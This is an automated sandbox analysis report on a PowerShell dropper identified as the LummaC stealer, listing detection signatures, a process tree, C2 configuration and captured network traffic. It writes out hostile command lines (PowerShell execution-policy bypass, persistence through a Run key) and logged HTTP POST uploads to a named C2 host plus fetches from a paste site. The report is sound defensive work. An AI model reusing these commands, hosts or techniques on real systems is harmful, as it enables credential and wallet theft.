Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bUAmCazc.ps1

Overview

General Information

Sample name:bUAmCazc.ps1
Analysis ID:1565310
MD5:fa478f449dec7d97732bf290fd92b7bc
SHA1:c08ed5100f487fe29245af63c388ead0b0e7b461
SHA256:b352201272b66562cea2dda2ec8b6aa1a5b0718f794c9f7c75c74cbdce4e6d1b
Tags:ps1user-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to evade analysis by execution special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Setup.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
      • Setup.exe (PID: 5460 cmdline: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe MD5: 7FB44C5BCA4226D8AAB7398E836807A2)
      • more.com (PID: 2144 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 5544 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • powershell.exe (PID: 4144 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 736 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • Setup.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://balloon-sneak.cyou/api", "Build Version": "MeHdy4--pl8vs07"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000003.2399976992.0000000003406000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 5544JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 5544JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: msiexec.exe PID: 5544JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5544, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", ProcessId: 4144, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5544, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", ProcessId: 4144, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", ProcessId: 6328, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6328, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.170.85, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6328, TargetFilename: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", ProcessId: 6328, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T15:45:51.132831+010020283713Unknown Traffic192.168.2.449736172.67.170.85443TCP
              2024-11-29T15:45:55.504840+010020283713Unknown Traffic192.168.2.449737172.67.170.85443TCP
              2024-11-29T15:46:00.312055+010020283713Unknown Traffic192.168.2.449739172.67.170.85443TCP
              2024-11-29T15:46:04.505532+010020283713Unknown Traffic192.168.2.449747172.67.170.85443TCP
              2024-11-29T15:46:09.082469+010020283713Unknown Traffic192.168.2.449758172.67.170.85443TCP
              2024-11-29T15:46:13.869083+010020283713Unknown Traffic192.168.2.449771172.67.170.85443TCP
              2024-11-29T15:46:18.572183+010020283713Unknown Traffic192.168.2.449783172.67.170.85443TCP
              2024-11-29T15:46:24.527434+010020283713Unknown Traffic192.168.2.449795172.67.170.85443TCP
              2024-11-29T15:46:29.110776+010020283713Unknown Traffic192.168.2.449806104.26.2.16443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T15:45:54.094934+010020546531A Network Trojan was detected192.168.2.449736172.67.170.85443TCP
              2024-11-29T15:45:58.553704+010020546531A Network Trojan was detected192.168.2.449737172.67.170.85443TCP
              2024-11-29T15:46:27.314353+010020546531A Network Trojan was detected192.168.2.449795172.67.170.85443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T15:45:54.094934+010020498361A Network Trojan was detected192.168.2.449736172.67.170.85443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T15:45:58.553704+010020498121A Network Trojan was detected192.168.2.449737172.67.170.85443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T15:46:16.481366+010020480941Malware Command and Control Activity Detected192.168.2.449771172.67.170.85443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 11.2.msiexec.exe.3295f08.1.unpackMalware Configuration Extractor: LummaC {"C2 url": "https://balloon-sneak.cyou/api", "Build Version": "MeHdy4--pl8vs07"}
              Multi AV Scanner detection for submitted file
              Source: bUAmCazc.ps1ReversingLabs: Detection: 15%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\eqoamnqfgJoe Sandbox ML: detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:49806 version: TLS 1.2
              Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
              Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\cefSubProcess\pc64-vc-tool-opt\bin\EACefSubProcess.pdb source: Updater.ex.0.dr
              Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-x64-cygwin-sans-NAS\jdk8u381\237\build\windows-x64\jdk\objs\javaw_objs\javaw.pdb source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000006.00000000.1932096504.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A31F90 FindFirstFileExW,6_2_00007FF764A31F90
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A17A9C FindFirstFileA,FindNextFileA,FindClose,6_2_00007FF764A17A9C

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49771 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49795 -> 172.67.170.85:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://balloon-sneak.cyou/api
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: rentry.co
              Source: Joe Sandbox ViewIP Address: 104.26.2.16 104.26.2.16
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 172.67.170.85:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.26.2.16:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1EO9KR8T3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18111Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=38KS5A4HANM6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8750Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QHZY9VZIKCL5LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W72OX4OUIQ3F8WYSFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XMVUGMOX0EZFEHTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 476224Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
              Source: global trafficDNS traffic detected: DNS query: balloon-sneak.cyou
              Source: global trafficDNS traffic detected: DNS query: rentry.co
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: balloon-sneak.cyou
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 29 Nov 2024 14:46:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8793Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
              Source: Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
